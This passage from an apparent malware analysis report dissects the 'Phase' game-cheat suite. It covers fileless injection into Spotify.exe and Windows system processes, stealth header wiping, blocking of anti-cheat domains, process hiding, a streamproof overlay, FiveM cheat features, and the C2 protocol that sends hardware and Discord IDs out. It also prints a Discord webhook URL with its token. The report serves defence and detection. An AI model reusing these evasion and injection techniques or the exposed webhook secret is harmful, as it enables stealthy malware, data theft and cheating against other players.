Apex, Minecraft). Four more (CS2, Tarkov, Rust, DayZ) are confirmed via product identifiers in the C2 protocol. Game-specific payloads are fetched from the C2 at runtime and were not recoverable except for the FiveM payload, which was obtained as a separate DLL file. Critically, Phase does not distribute a visible executable file. The payload is injected directly into the memory of a legitimate running process — in our recovered case, Spotify.exe. A 686 MB process memory dump was recovered proving this fileless hosting approach. The loader uses Windows Service Control Manager APIs to locate the svchost.exe instance hosting the Dnscache service, then cascades injection into five additional system processes. This means the cheat has zero disk footprint once loaded and its evasion modules run under the identity of trusted Windows processes. Module inventory ---------------- Eight PE binaries were recovered and analyzed. All are x64 PE32+ binaries compiled with MSVC. | # | Module | Size | Role | | --- | --- | --- | --- | | 1 | IBYPASS\_main\_module.exe | 3,055,616 B | Loader, auth client, manual mapper, UI shell | | 2 | IBYPASS\_fivem\_module.dll | 11,943,936 B | FiveM cheat payload (aimbot, ESP, Lua runtime) | | 3 | bp-shell\_payload.dll (variant A) | 36,864 B | WFP anti-cheat domain blocker | | 4 | bp-shell\_payload.dll (variant B) | 18,432 B | WFP anti-cheat domain blocker (compact) | | 5 | nvidia\_patcher\_fff.dll | 28,672 B | Reflective loader + display affinity patcher | | 6 | procexp-hook\_hxfd.dll | 32,768 B | NtQuerySystemInformation process hider | | 7 | unknown\_135k\_module.dll | 135,168 B | D3D11 renderer + thread hijacker + font embed | | 8 | unknown\_24k\_module.dll | 24,576 B | Transparent streamproof overlay window | ### Embedded PE hierarchy These eight files are not independent. PE-carving confirms that the larger modules physically embed copies of the smaller ones at fixed file offsets — the whole suite ships inside two carriers. The matches were verified by comparing embedded PE timestamps and section counts against the standalone binaries. Embedded PE Hierarchy (verified by carve + timestamp match)IBYPASS\_main\_module.exe (3.0 MB).data section: 1.5 MB @ entropy 7.81 (encrypted)bp-shell\_payload (variant B, 18 KB)@ offset 0x13D400 · byte-identical · 2026-05-11\+ embedded JPEG/PNG/GZIP assets · SwissTypefaces fontdiscord\_id\_extractor + CryptUnprotectDataIBYPASS\_fivem\_module.dll (11.9 MB)11 sections · .hookstu / .retplne / .fptableprocexp-hook\_hxfd.dll@ 0x788030 · 2025-12-30(unidentified DLL)@ 0x78B030 · 2026-02-28unknown\_24k\_module.dll@ 0x89EDDC · 2026-06-02nvidia\_patcher\_fff.dll@ 0x95B5A0 · 2026-04-05unknown\_135k\_module.dll@ 0x95DBB0 · 2026-04-08embedded copies are obfuscated variants of the standalones.rdata: 2.6 MB @ entropy 7.08nvidia\_patcher\_fff.dll (standalone, 28 KB)embeds truncated unknown\_135k headers @ 0x2610→ reflective loader maps full body at runtime5 of 8 modules hide 2.4–2.7 KB of executable x64 code in PE header slack (offset < first section)clean slack: main module, bp-shell variant B, FiveM module — all others carry hidden code ### Compile timestamps | Module | Timestamp | Linker | | --- | --- | --- | | procexp-hook\_hxfd.dll | 2025-12-30 | MSVC 14.44 (oldest) | | (unidentified embedded DLL) | 2026-02-28 | — | | nvidia\_patcher\_fff.dll | 2026-04-05 | MSVC 14.50 | | unknown\_135k\_module.dll | 2026-04-08 | MSVC 14.50 | | bp-shell\_payload.dll | 2026-05-11 | MSVC 14.51 | | IBYPASS\_main\_module.exe | 2026-05-24 | MSVC | | unknown\_24k\_module.dll | 2026-06-02 | MSVC 14.0 | | IBYPASS\_fivem\_module.dll | 2026-06-15 | MSVC (newest) | The spread of timestamps (December 2025 → June 2026) and three different MSVC toolchain versions indicate the suite is assembled from independently maintained components, consistent with the multiple developer handles found in the PDB paths. Delivery architecture --------------------- The following diagram illustrates the payload delivery chain from initial host process injection through game payload delivery. Every step was reconstructed from strings, imports, and decompiled pseudocode in the loader module. Phase.uno Payload Delivery ArchitecturePayload injected into host process (e.g. Spotify.exe)Anti-analysis scan (200+ tools) → exit if detectedHWID collectionDisk serial (0x2D1400) + SMBIOS (RSMB) + GPU (DXGI)Discord ID scrape + C2 authenticationPOST us1.phase.uno/auth/v1 {pin, hwid, discord\_ids} → AES-GCM sessionInject evasion modules into system processessvchost.exe:Dnscache, RuntimeBroker, SearchIndexer, dwm.exe, ctfmon.exebp-shell: WFP blocks napse.ac + detect.acprocexp-hook: hide processesFindWindow for game-specific class namesPayload download + decryptGET /download/v1 → AES-GCM decrypt → PE payloadInject support modules into game processnvidia\_patcher + unknown\_24k (overlay) + unknown\_135k (renderer)Manual map game payload + stealth cleanupNtCreateSection → NtMapViewOfSection → NtCreateThreadEx → header eraseCheat active in game process No-EXE fileless launch ---------------------- Phase does not run as a standalone .exe visible in the filesystem. Instead, the payload is loaded directly into the memory of a legitimate, already-running process. This means there is no cheat executable on disk to find — the entire payload exists only as bytes inside another process's address space. **Evidence:** A 686,547,644-byte (686 MB) Spotify.exe process memory dump was recovered from a Phase user's system (file: Spotify.exe\_2026-06-15\_20-08-49.dmp, SHA-256: 0285239edcb14ca7bc17ece642cd30d073cb6e593da29e747fba7e61168da52a). Analysis of this dump confirmed that the complete Phase payload — loader logic, injection routines, and C2 communication — was resident inside the Spotify process memory space. The loader itself requires admin privileges (confirmed by AllocateAndInitializeSid + CheckTokenMembership for BUILTIN\\Administrators SID check in FUN\_140018e90). Once elevated, it enables three token privileges: SeDebugPrivilege (for cross-process injection), SeAssignPrimaryTokenPrivilege, and SeIncreaseQuotaPrivilege (confirmed at FUN\_1400451a0). The process hosting approach means: * No .exe file on disk for antivirus to scan * No process with a suspicious name in Task Manager * The cheat runs under the identity and trust level of the host process * Memory-only — survives only while the host process is alive * After destruct, zero filesystem artifacts remain from the payload itself No-EXE Fileless Launch FlowLegitimate process (e.g. Spotify.exe)← Phase payload injected into memoryPayload runs inside host process memory (no file on disk)SCM API queries → finds svchost.exe:DnscacheCascading injection into system processes Spotify process hosting ----------------------- The specific host process recovered in our analysis was Spotify.exe. Spotify is an ideal host because: * It is always running on most gaming PCs (auto-starts with Windows) * It is a large, complex application — a 686 MB memory footprint is normal and does not raise suspicion * It has legitimate network activity, making C2 traffic less conspicuous * It is a signed, trusted application that security tools rarely scrutinize The dump file (Spotify.exe\_2026-06-15\_20-08-49.dmp) was captured on June 15, 2026 at 20:08:49. The timestamp and file naming convention suggest it was captured using a process memory dumping tool (likely Windows Task Manager's "Create dump file" or procdump). The payload bytes within this dump contained all the strings, imports, and code structures documented throughout this report — confirming that Spotify.exe was the active host for the Phase cheat at the time of capture. **Detection note:** Look for anomalous memory regions inside Spotify.exe — specifically, executable memory pages that do not correspond to any known Spotify module. RW→RX page transitions, unbacked executable memory, and the presence of PE headers (even partially erased ones) in non-module memory are all indicators. Services.msc injection chain ---------------------------- The most novel aspect of Phase's injection system is its use of the Windows Service Control Manager (SCM) to locate injection targets. The loader imports these SCM APIs from ADVAPI32.dll (confirmed in the PE import table): * OpenSCManagerW(NULL, NULL, SC\_MANAGER\_CONNECT) — connects to the local Service Control Manager database * OpenServiceW(hSCManager, "Dnscache", SERVICE\_QUERY\_STATUS) — opens a handle to the DNS Client service * QueryServiceStatusEx(hService, SC\_STATUS\_PROCESS\_INFO, ...) — retrieves SERVICE\_STATUS\_PROCESS containing the PID of the svchost.exe instance hosting Dnscache * CloseServiceHandle() — cleanup of all SCM handles The injection flow works as follows: 01 services.msc launch The user (or an automated script) opens services.msc from cmd. 02 SCM connection The loader connects to the local SCM via OpenSCManagerW. 03 Dnscache service lookup It opens the "Dnscache" service via OpenServiceW (confirmed by the string "dnscache" at address 0x140143900, referenced in FUN\_140018bf0). 04 PID extraction It queries the service status via QueryServiceStatusEx to obtain the PID of the svchost.exe instance hosting Dnscache. 05 Process access With the PID identified, the loader opens the svchost.exe process via OpenProcess(0x43a) — PROCESS\_CREATE\_THREAD | PROCESS\_QUERY\_INFORMATION | PROCESS\_VM\_OPERATION | PROCESS\_VM\_WRITE | PROCESS\_VM\_READ. The injection orchestrator FUN\_14001adc0 calls FUN\_14001ab30 to build a candidate PID list, then FUN\_14004d680 for manual mapping. 06 bp-shell injection It injects bp-shell (WFP domain blocker) into this svchost.exe instance. The string "svchost.exe:Dnscache" at address 0x1401439f8 (referenced in FUN\_140018e90) confirms the targeting. Because WFP filter rules created by code running inside svchost.exe appear to be legitimate Windows activity, this makes detection extremely difficult. ### Why Dnscache? The DNS Client service was deliberately chosen as the injection target because the svchost.exe instance hosting it has ideal properties: * **Always running** — Dnscache is a critical Windows service that cannot be disabled without breaking DNS resolution * **Runs as NT AUTHORITY\\NETWORK SERVICE** — elevated privileges but not SYSTEM, reducing suspicion in process audits * **Has network access permissions** — required for the WFP blocker to create and manage filtering rules * **Trusted by security tools** — most EDR solutions and anti-cheat systems whitelist svchost.exe processes, especially those hosting known Windows services ### Post-PID injection orchestration After obtaining the svchost PID, execution flows to FUN\_14001adc0 which orchestrates the actual injection: * Calls FUN\_14001ab30 to build a candidate target PID list * For each candidate: OpenProcess(0x43a) — access mask 0x43a = PROCESS\_CREATE\_THREAD | PROCESS\_QUERY\_INFORMATION | PROCESS\_VM\_OPERATION | PROCESS\_VM\_WRITE | PROCESS\_VM\_READ * Calls FUN\_14004d680 for manual mapping of the bp-shell payload into the target process * On success, logs "success: injected into pid %u" After the Dnscache svchost injection, the loader cascades into additional system processes using CreateToolhelp32Snapshot + Process32FirstW/NextW enumeration: | System process target | Child process names | | --- | --- | | RuntimeBroker.exe | main.cpl, node.exe, python.exe | | SearchIndexer.exe | main.cpl, node.exe, python.exe | | SearchHost.exe | main.cpl, node.exe, python.exe | | dwm.exe | main.cpl, node.exe, python.exe | | ctfmon.exe | main.cpl, node.exe, python.exe | Services.msc Injection Chaincmd.exe → services.mscOpenSCManagerW → SCM DatabaseOpenServiceW("Dnscache")QueryServiceStatusEx → PID of svchost.exe:DnscacheOpenProcess(0x43a) on svchost PIDInject bp-shell → WFP domain blocking from svchost.exeCreateToolhelp32Snapshot enumeration ↓RuntimeBroker.exeSearchIndexer.exeSearchHost.exedwm.exectfmon.exemain.cplnode.exepython.exemain.cplnode.exe Authentication & HWID collection -------------------------------- The loader collects three hardware identifiers before contacting the C2 server: 01 Disk serial number Retrieved via DeviceIoControl with IOCTL control code 0x2D1400 (IOCTL\_STORAGE\_QUERY\_PROPERTY). Provides a unique physical disk identifier. 02 SMBIOS firmware table Retrieved via GetSystemFirmwareTable with signature 'RSMB'. Contains motherboard serial, manufacturer, and BIOS information from the system firmware. 03 GPU identifier Enumerated through EnumDisplayDevices and the DXGI interface (CreateDXGIFactory import confirmed). Provides GPU model and driver information. Additionally, the loader reads registry keys for system fingerprinting: SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion (for CurrentBuild, SystemProductName) and HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0 (for ProcessorNameString). An external IP check is performed via api.ipify.org. ### C2 protocol The composite HWID and collected identifiers are sent to the C2 server. Confirmed endpoints: | Endpoint | Purpose | | --- | --- | | /auth/v1 | PIN + HWID + Discord ID authentication | | /download/v1 | Encrypted payload download (game-specific) | | /config/list | Dynamic WFP blocklist + configuration | | /telemetry/v1 | Telemetry / event reporting | | /config/delete | Config cleanup on destruct | | /config/import | Config import | | /config/save | Config save | | /config/share | Config sharing | | /config/load | Config load | | /product/heartbeat | Session keepalive | | /product/system\_info | System info telemetry | | /online/players?api\_key= | Online player count | | /handshake | Session key exchange (AES-GCM) | Confirmed JSON fields (from string analysis): pin, hwid, found\_discord\_ids, session\_token, download\_token, encrypted\_data, encrypted\_key, nonce, tag, session\_expires\_at, hardware\_id, banned, online\_count, detection\_type, protection\_trigger. The User-Agent string is spoofed as Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 to blend with normal browser traffic. The handshake uses a hardcoded 256-bit server public key: Zbgn8Nv7fN8DPJko4ka1jQomMsJcco4SZv3TRU8N7+k= (base64, decodes to 32 bytes). The auth response returns a subscription model with fields: products, subscriptions (with product, expires\_at, is\_active), api\_key, and online\_count. All C2 communication is encrypted with AES-GCM via the Windows bcrypt library. Imports confirmed: BCryptOpenAlgorithmProvider, BCryptGenerateSymmetricKey, BCryptEncrypt, BCryptDecrypt, BCryptDeriveKeyPBKDF2 with ChainingModeGCM string present in the binary. ### Discord telemetry The loader scans local Discord LevelDB storage directories to extract user IDs. Three paths are checked: \\Discord, \\discordcanary, \\discordptb. C++ symbols confirm the implementation: get\_discord\_ids@discord\_id\_extractor and scan\_leveldb\_directory@discord\_id\_extractor. Extracted IDs are sent to the C2 and also to a hardcoded Discord webhook for telemetry/logging: discord.com/api/webhooks/1506075252847808543/YVB5hF6Pd396CjG1zRpHZicbxD0UcB2KsKJQOINI70fPPiudcPWToXzyrlido7NLdA2f. System process injection ------------------------ One of the most significant findings in our analysis: the loader does not only inject into game processes. It injects evasion modules into trusted Windows system processes to disguise their activity. In the decompiled function FUN\_140018e90 (7,323 bytes), the loader first verifies it has administrator privileges via AllocateAndInitializeSid + CheckTokenMembership. It then escalates privileges via FUN\_1400181f0 which enables three token privileges using LookupPrivilegeValueW + AdjustTokenPrivileges: * SeDebugPrivilege — allows opening any process regardless of DACL (confirmed at address 0x143858) * SeAssignPrimaryTokenPrivilege — allows assigning tokens to child processes for masquerading * SeIncreaseQuotaPrivilege — allows increasing process memory quotas for injection After privilege escalation, it builds arrays of target system process names: System Process Injection TargetsPhase Loader (admin)svchost.exe:DnscacheRuntimeBroker.exeSearchIndexer.exeSearchHost.exedwm.exectfmon.exeResult: evasion code runs inside trusted Windows processesWFP filter rules appear to come from svchost.exe — a process checkers would never suspectProcess hiding runs inside RuntimeBroker — an always-running system processChild/fallback process names paired with each target:main.cplnode.exepython.exeAdditional reference: winlogon.exe (FUN\_140045280) The string "svchost.exe:Dnscache" at address 0x1401439f8 is referenced by FUN\_140018e90. The companion string "dnscache" at 0x140143900 is referenced by the related function FUN\_140018bf0. Nearby in the same code path: "success: injected into pid %u" and "pid %u: OpenProcess err=%lu". The loader requires SeDebugPrivilege (string confirmed at 0x143858) to inject into system-level processes. Manual mapping & thread context hijacking ----------------------------------------- The loader uses NT-native manual mapping for payload injection. The confirmed API chain (from both imports and debug strings): Manual Mapping Injection ChainNtCreateSectionCreate shared memoryNtMapViewOfSectionMap local + remoteNtCreateThreadExExecute in targetRtlAddFunctionTableRegister exceptionsNtProtectVirtualMemoryFix page protectionsEntry trampolineRun DllMainAlternative: Thread Context Hijacking (unknown\_135k\_module)CreateToolhelp32Snapshot → SuspendThread → GetThreadContext→ SetThreadContext (RIP redirect) → ResumeThread → FlushInstructionCache Debug strings from the manual mapper confirm the entire sequence: Recovered debug strings \[map\] section mapped: local=%p remote=%p size=0x%zx \[map\] remote NtMapViewOfSection failed: 0x%08lx \[map\] DLL has no entry point \[map\] trampoline %zu bytes at remote=%p (entry=%p, raft=%p, pdata=%p x %u) \[map\] entry returned exit\_code=0x%08lx (image base=%p) \[map\] real module %ls not present in target after load attempt The thread context hijacking in unknown\_135k\_module.dll provides an alternative injection path that avoids creating new threads. It writes 5-byte near JMP instructions into allocated memory and uses VirtualAlloc + VirtualProtect to set up executable shellcode regions. Post-injection stealth ---------------------- After injection completes, the loader performs a multi-phase cleanup of injection artifacts in the target process memory: \[stealth\] phase 1: starting post-init stealth (wipe=%d erase=%d) \[stealth\] PE headers erased @%p size=0x%zx \[stealth\] wiped discardable %.8s @%p size=0x%zx \[stealth\] discardable wipe done (%u sections) \[stealth\] header erase ro failed: 0x%08lx \[stealth\] header erase rw failed: 0x%08lx \[stealth\] phase 1: header erase failed (continuing) \[stealth\] phase 2: TLS callback collection failed (continuing) This means: the MZ/PE headers are zeroed out in the remotely-mapped module, and PE sections marked as discardable are wiped. Memory scanners looking for PE signatures will not find the injected module. The TLS callback surface is also collected as part of the stealth pass. The loader also manipulates registry key metadata using NtSetInformationKey with restore semantics. The strings "restore: RegOpenKeyExW(%s, KEY\_ALL\_ACCESS) FAILED" and "restore: NtSetInformationKey(%s) -> NTSTATUS=0x%08lX" suggest manipulation of registry key last-write timestamps to hide evidence of cheat-related registry activity. WFP domain blocker (bp-shell) ----------------------------- bp-shell is the network evasion component. It installs Windows Filtering Platform block filters so the infected machine cannot reach anti-cheat service domains. Because it runs inside a trusted system process (injected via the system-process injection described above), the WFP filters appear to be created by legitimate Windows services. WFP Domain Blocking Mechanismgetaddrinfo(domain)Resolve to IP addressesFwpmFilterAdd0()Block at ALE\_AUTH\_CONNECTBLOCKEDKernel levelConfirmed WFP GUIDs in .rdataFWPM\_LAYER\_ALE\_AUTH\_CONNECT\_V4c38d57d1-05a7-4c33-904f-7fbceee60e82FWPM\_LAYER\_ALE\_AUTH\_CONNECT\_V64a72393b-319f-44bc-84c3-ba54dcb3b6b4FWPM\_CONDITION\_IP\_REMOTE\_ADDRESSb235ae9a-1d64-49b8-a44c-5ff3d9095045Hardcoded blocklist (RVA 0x35c8)napse.acdetect.ac\+ dynamic list from us1.phase.uno/config/list | Refresh: every 300 seconds This is a **debug build**. Every action logs a \[bp-shell\] prefixed message. The module requires admin elevation ("(needs admin)" string). On shutdown, it cleanly tears down all filters via FwpmFilterDeleteById0, closes the WFP engine, and calls WSACleanup. The imports are minimal and single-purpose: fwpuclnt.dll for WFP operations, WS2\_32.dll for DNS resolution, and KERNEL32.dll for threading/lifecycle. No file, registry, or process-manipulation imports. The blocklist is only a fallback. The loader fetches additional domains from https://us1.phase.uno/config/list at runtime, meaning new anti-cheat services can be blocked without updating the binary. Process hiding (procexp-hook) ----------------------------- This module hooks NtQuerySystemInformation in ntdll.dll to filter cheat-related processes from any tool that enumerates running processes (Task Manager, Process Hacker, Process Explorer, etc.). 12-byte Inline Hook (MOV RAX / JMP RAX Trampoline)Original NtQuerySystemInformationntdll!NtQuerySystemInformation→Patched (first 12 bytes)MOV RAX, ; JMP RAXPhase filter functionWalks process list, removes entries matching target names\_wcsicmp() for case-insensitive comparison The hook is installed 3 seconds after DLL load (Sleep(3000) in DllMain). The API is resolved dynamically: GetModuleHandleW(L"ntdll.dll") → GetProcAddress("NtQuerySystemInformation"). After patching, FlushInstructionCache ensures the CPU executes the new bytes. Filter target names in strings: notepad.exe and chrome.exe (UTF-16). These are likely development placeholders or the disguise names given to cheat processes. This module was recovered as a memory dump artifact, not an on-disk binary. PDB path: C:\\Users\\hxfd\\source\\repos\\procexp-hook\\x64\\Release\\procexp-hook.pdb. Compile timestamp: 2025-12-30. Streamproof overlay (unknown\_24k\_module) ------------------------------------------ This module creates the transparent overlay window where ESP, aimbot indicators, and other visuals are drawn. It has two remarkable structural properties: * **Code hidden in PE header slack space.** 3,512 bytes of slack between offset 0x248 and 0x1000, of which 2,458 bytes (70%) are non-zero executable x64 code — **384 code pattern matches**, the highest density of any Phase binary. Functions include DllMain at 0x180000400, WndProc at 0x180000960, UpdateWindow at 0x180000B10, TimerHandler at 0x180000C50. Standard PE analysis tools examining only defined sections will miss this code entirely. * **Cannot be loaded with LoadLibrary.** Requires a reflective or custom loader because the code falls outside standard section boundaries. * **Memory dump artifact.** The .rdata section contains runtime-resolved addresses in the 0x00007FF8... range — this binary was dumped from a running process, not extracted from disk. It has no .reloc section, no debug directory, no exports. * **Only 5 PE sections** (.text, .rdata, .data, .pdata, .rsrc) — the most minimal PE structure in the Phase suite. The overlay window setup chain: * Window class name: "NVIDIA GeForce RTX 5060" — disguised as an NVIDIA driver overlay. * CreateWindowExW with layered/transparent extended styles. * SetWindowDisplayAffinity(WDA\_EXCLUDEFROMCAPTURE) — invisible to all screen capture, streaming software, and Discord screenshare. * DwmExtendFrameIntoClientArea for click-through glass composition. * SetLayeredWindowAttributes for transparency control. * SetWindowPos for TOPMOST positioning. ### Shared memory IPC The overlay receives drawing data from the game payload via a named memory-mapped file: Local\\wisrc. The name is constructed character by character in assembly using movabs instructions. Size: 12,400 bytes (0x3070). Magic value at offset 0: "NAIL" (0x4C41494E). Created via CreateFileMappingA + MapViewOfFile. D3D11 renderer (unknown\_135k\_module) -------------------------------------- The rendering engine for ESP/aimbot visuals. At 135 KB with 7 PE sections and 18,325 disassembly lines, this is the most complex auxiliary module. ### PE structure anomalies * **Header slack code:** 3,288 bytes of slack between offset 0x328 and 0x1000, of which 2,716 bytes (82.6%) contain executable x64 code — 320 code pattern matches. The main initialization routine lives here, including a polling loop (300 iterations, 100 ms sleep), NtOpenThread/ NtCreateThreadEx patterns, and atomic lock acquisition. * **Deliberately corrupted import table.** OriginalFirstThunk is set to 0xFFFFFFFF — any standard PE parser will fail or crash on this module. Relocation table is also garbled (VA 0x666D7563 \= ASCII "cumf", claims 985M fixups). * Custom PE section .fptable at offset 0x1E000 — 256 bytes of active content (RW). Contains a table of 16-bit signed relative offsets (values like 0x93FE, 0x88FE, 0x8FFE) used as a function dispatch table into .text. Same naming convention as the FiveM payload — confirms shared toolchain. * **High-entropy .rsrc** — entropy 7.03 for a resource section is abnormal and suggests the resource data contains compressed or encrypted payloads. ### Inline hooking engine The core hooking function at 0x1800015A0 implements a full inline hook framework: * Writes a 0xE9 (JMP rel32) trampoline to the target function * Calculates relative offset from hook to detour * Writes hotpatch bytes 0xEB 0xF9 (short JMP back) for Microsoft-style hotpatching * VirtualProtect → PAGE\_EXECUTE\_READWRITE (0x40) → FlushInstructionCache * Hook metadata structures: 0x38 bytes each, thread-safe via spinlock ( lock cmpxchg at 0x18001AC38) ### Rendering capabilities * Imports D3D11CreateDevice from d3d11.dll — creates its own rendering device rather than hooking the game's Present call. * COM/DirectX vtable calls through interface pointer at 0x18001AC18 with vtable offsets +0x20, +0x40, +0x48, +0x50, +0x1A8. * **167 indirect call/jmp instructions** — heavily concentrated through IAT at 0x18000F400\-0x18000F6F0. * Private heap via HeapCreate / HeapAlloc / HeapFree / HeapDestroy for isolated memory management. * Embeds a complete **Cascadia Mono PL Regular** font (Microsoft OpenType/CFF, OFL-licensed) in the .pdata section for ESP text rendering. * References amfrtdrv64.dll (AMD AMF Runtime) and mscoree.dll (CorExitProcess) — GPU compatibility across vendors. ### Suspicious LEA instructions Two LEA instructions reference 0x17FFFF400 — **below** the image base 0x180000000: 0x1800031D4: lea -0x3ddb(%rip),%rdx → 0x17FFFF400 0x180002356: lea -0x2f5d(%rip),%rbx → 0x17FFFF400 These out-of-bounds references suggest the module expects to be mapped at a specific address with preceding memory already allocated — consistent with the reflective loader mapping multiple modules contiguously. NVIDIA patcher (reflective loader) ---------------------------------- This module contains **two stacked PE binaries**: an outer 28 KB stub (entry at 0x180001444) and an embedded 135 KB inner PE at file offset 0x2610 (entry at 0x180003A44, 7 sections including .fptable, SizeOfImage: 0x21000 \= 135,168 bytes). The inner PE is a **truncated copy** of unknown\_135k\_module.dll — same timestamp (2026-04-08), same 7 sections, but only 18,928 bytes of data exist past the header. The full binary is loaded separately at runtime; these headers serve as parsing metadata. ### PE header slack code 3,344 bytes of slack between offset 0x2F0 and 0x1000, of which 2,574 bytes (77%) contain executable x64 code — 213 code pattern matches. The header code contains full DllMain-style dispatch logic with LoadLibrary/ GetProcAddress calls and pipe I/O operations. ### Anti-tamper and obfuscation * **Import table obfuscated** — DLL name field is 0x7865742E \= ".tex" instead of a real DLL name. Standard PE import parsing fails. * Only ~375 bytes of actual code in .text (0x180001000-0x180001177). The rest of the operational logic is hidden in header slack and .data. * CFG dispatch at 0x180001044 with XOR %rax,%rdx anti-tampering check. * Exception filter at 0x180001160 catches STATUS\_ACCESS\_VIOLATION (0xC0000005) — intentional exception-based control flow. * .data section (0x180003000-0x180003120) contains executable code stored in a non-executable section — executed via RWX reprotection at runtime. * All metadata sections corrupted — .pdata, .rsrc, .reloc, debug directory entries all have invalid values (types 808333607, 980316789, 863383149). It dynamically resolves GetWindowDisplayAffinity from user32.dll, connecting it to the overlay's stream-proofing system. Both PEs have zeroed checksums. Outer subsystem: console; inner subsystem: GUI. PDB path: C:\\Users\\fff\\Desktop\\Senata\\nvidia\\x64\\Release\\patcher.pdb. Same developer username (fff) as bp-shell. MSVC 14.50 (Visual Studio 2022+). FiveM payload deep-dive ----------------------- The FiveM payload is the only game-specific DLL recovered (11.9 MB). It has custom PE sections: .hookstu (hook stubs), .retplne (return plane trampolines), .fptable (function pointer table), .tls (TLS callbacks). ### Installed hooks aimbot\_input\_hook c\_event\_gun\_shot\_hook c\_event\_gun\_shot\_bullet\_impact\_hook vehicle\_spawner\_hook recoil\_hook crash\_hook c\_ped\_reset\_flag\_hook c\_ped\_config\_flag\_hook player\_sector\_pos\_data\_node\_hook gamestate\_data\_node\_hook player\_appearance\_data\_node\_hook ped\_shader\_tex\_hook ### Anti-cheat event suppression Five FiveM anti-cheat events are hooked and suppressed: * anticheat:weaponViolation * anticheat:pedModelViolation * anticheat:noclipViolation * anticheat:protectionViolation * anticheat:bubbleViolation By intercepting these events, Phase prevents violation reports from reaching the server. It also hooks txsv:logger:deathEvent for death event logging suppression. The payload references three FiveM native DLLs directly: citizen-playernames-five.dll, citizen-resources-core.dll, citizen-scripting-core.dll. ### Full feature surface Config keys recovered from strings reveal the complete cheat capability set: | Category | Capabilities | | --- | --- | | Aimbot | Target priority, smoothing (X/Y), FOV, deadzone, dynamic smoothing, prediction, jitter, reaction time, visible check, weapon range respect, hitbox override, maximum distance, magic bullet | | Silent Aim | Separate FOV/hitbox/target priority, visible check, hit chance, weapon range respect, maximum distance | | Triggerbot | Hitbox targeting, mode selection, reaction time, time between shots | | RCS/Recoil | Recoil control system with adjustable strength | | Fake Lag | Configurable delay (ms) for desync exploitation | | Double Tap | Probability-based double-tap with chance modifier | | ESP/Visuals | Skeleton, name, weapon, weapon icon, distance, armor bar, health bar, level, fraction, static ID, vehicle box/marker/speed/name | | World | Remove shadows, sky, water; modify clouds, moon, sun, weather | | Chams | Mesh chams, shader/texture hook (ped\_shader\_tex\_hook) | | Vehicle | Spawner, velocity manipulation, wheel break, model info flags | | Ped/Player | Model changer, config flags, reset flags, state manipulation | | Weapon | Equip/give weapon, melee damage modifier, recoil hook | | Misc | Streamproof toggle, auto-inject, spectator list, custom resolution, keybind system, radar with player rotation | | Teleport | Teleport peek with draw circle visualization | | Anti-headshot | Passive protection against headshots | ### Embedded Lua 5.5 runtime The payload includes a full Lua 5.5 runtime. Confirmed strings: $LuaVersion: Lua 5.5.0, \[LUA\] calling luaL\_loadbuffer, \[LUA\] calling lua\_pcall, \[LUA\] runtime error detected. Since FiveM runs on Lua, this enables arbitrary script execution inside the game engine. ### Recovered config (tonio\_config) 30° Aimbot FOV 500 Aimbot max distance (units) 65 / 50 Smoothing X / Y 2° / 100% Silent aim FOV / hit chance 100 ms Fake lag delay 2560×1440 Resolution Enabled features: aimbot, prediction, fake lag, silent aim, ESP (skeleton, name, weapon, distance, armor bar). Anti-analysis inventory ----------------------- The loader scans for **200+ security and analysis tools** via window class enumeration, process name matching, named object checks, device driver probes, mutex detection, service enumeration, loaded module scanning, and directory path scanning. It also verifies 16 critical Windows API functions have not been hooked by security tools, using XOR-obfuscated API name resolution (keys 0xa879ddeddcaecfb5, 0x46802f2cec801086). Every string below was recovered directly from the binary. ### Verified string / payload encryption scheme Disassembly of IBYPASS\_main\_module.exe confirms the two keys are not a guess: key 1 appears as a movabs immediate **25 times** and key 2 **17 times**, loaded into registers and pushed onto the stack as a contiguous 16-byte block {key1, key2}. Decryption is then performed with 128-bit SIMD — movdqa loads the key block and xorps / vpxor XORs it against the ciphertext (a 256-bit vmovdqu / vpxor variant handles 32-byte blocks). The encrypted data is stored as 44 distinct key-1 variants and 12 key-2 variants where only the low bytes differ per string. The decrypted blobs are guarded by an integrity hash at 0x1400158a0: seed 0x12345678, ROR 31 + XOR per byte, multiplied by 0x61c88647 (the golden-ratio Fibonacci-hashing constant), compared against a stored hash at 0x1402da228. A separate MurmurHash3-style routine at 0x1400e6f40 (round constants 0x239b961b, 0xab0e9789, 0x38b34ae5, 0xa1e38b93) is used for fast table lookups. Independent disassembly of the auxiliary DLLs (bp-shell, nvidia\_patcher, procexp-hook) confirms **neither key is present in any of them** in either byte order — the XOR obfuscation scheme is unique to the main loader. The only notable constant shared across those modules is 0x2B992DDFA232, which is the default MSVC \_\_security\_cookie sentinel — a standard compiler artifact, not a Phase marker, and deliberately excluded from our detection signatures to avoid false positives. ### Anti-VM CPUID vendor check bp-shell, procexp-hook, and nvidia\_patcher each contain the same three XOR-immediate instructions that reconstruct the string GenuineIntel (0x6c65746e "ntel", 0x49656e69 "ineI", 0x756e6547 "Genu") for comparison against the CPUID vendor leaf — a lightweight virtual-machine / sandbox detection check performed before the payload runs. ### Process names scanned x64dbg.exe x32dbg.exe ollydbg.exe windbg.exe windbgx.exe kd.exe ntkd.exe cdb.exe ntsd.exe immunitydebugger.exe remedybg.exe dbgx.shell.exe dbgview.exe ida.exe ida64.exe idag.exe idag64.exe idaq.exe idaq64.exe ghidra.exe ghidrarun.exe ghidrasvr.exe binaryninja.exe binaryninjacloud.exe cutter.exe radare2.exe r2.exe rizin.exe iaito.exe dnspy.exe dnspy-x86.exe dotpeek.exe ilspy.exe de4dot.exe retdec-decompiler.exe snowman.exe recstudio.exe jd-gui.exe bytecodeviewer.exe jadx-gui.exe httpdebuggerui.exe httpdebugger.exe httpdebuggerscv.exe httpdebuggerscvx.exe httpdebugerpro.exe wireshark.exe tshark.exe dumpcap.exe rawcap.exe fiddler.exe fiddler everywhere.exe fiddleranywhere.exe charles.exe burpsuite.exe burpsuitecom.exe mitmproxy.exe mitmweb.exe mitmdump.exe smartsniff.exe networkminer.exe httptoolkit.exe proxifier.exe proxycap.exe processhacker.exe processinformer.exe systemexplorer.exe procmon.exe procmon64.exe procmon64a.exe procexp.exe procexp64.exe procexp64a.exe autoruns.exe autoruns64.exe autorunsc.exe autorunsc64.exe handle.exe handle64.exe listdlls.exe listdlls64.exe vmmap.exe vmmap64.exe rammap.exe rammap64.exe strings.exe strings64.exe sigcheck.exe sigcheck64.exe tcpview.exe tcpvcon.exe portmon.exe 